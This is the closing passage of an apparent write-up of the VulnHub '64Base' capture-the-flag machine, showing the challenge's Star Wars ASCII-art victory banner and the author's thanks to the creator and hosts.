Imperial Sourcebook, The Star Wars Rebel Alliance Source- book, Star Wars: The Roleplaying Game (2nd Ed) all by West End Games, Inc. ____________________________________________________________________________ ______ ______ ______ ______ ______ ______ ______ ______ |______||______||______||______||______||______||______||______||______| _ _ ____ __ __ __ __ ____ _ _ _ _____ ______ | \ | | / __ \\ \ / / \ \ / // __ \ | | | |( )| __ \ | ____| | \| || | | |\ \ /\ / / \ \_/ /| | | || | | ||/ | |__) || |__ | . ` || | | | \ \/ \/ / \ / | | | || | | | | _ / | __| | |\ || |__| | \ /\ / | | | |__| || |__| | | | \ \ | |____ |_| \_| \____/ \/ \/ |_| \____/ \____/ |_| \_\|______| _ ______ _____ _____ _ /\ | || ____|| __ \|_ _|| | / \ | || |__ | | | | | | | | / /\ \ _ | || __| | | | | | | | | / ____ \ | |__| || |____ | |__| |_| |_ |_| /_/ \_\ \____/ |______||_____/|_____|(_) ______ ______ ______ ______ ______ ______ ______ ______ ______ |______||______||______||______||______||______||______||______||______| I hope you enjoyed this challenge Please leave comments & feedback @ https://www.vulnhub.com/?q=64base ----------------------------------- 64Base Challenge by 3mrgnc3 @ https://3mrgnc3.ninja -----------------------------------
Holy cow! This was an awesome VM to work with. There were a ton of tools and tricks that I either haven't used in forever, or was able to learn. I really loved the Star Wars theme and the ASCII art. This VM had plenty of rabbit holes to get lost in but had the perfect amount of *hints* to help keep you on track.
I'd like to thank @3mrgnc3 for creating such a fun VM and of course g0tmi1k and vulnhub for hosting these wonderful images. Also, I'd like to thank some of my buddies that worked on this with me.
Until next time!
geoda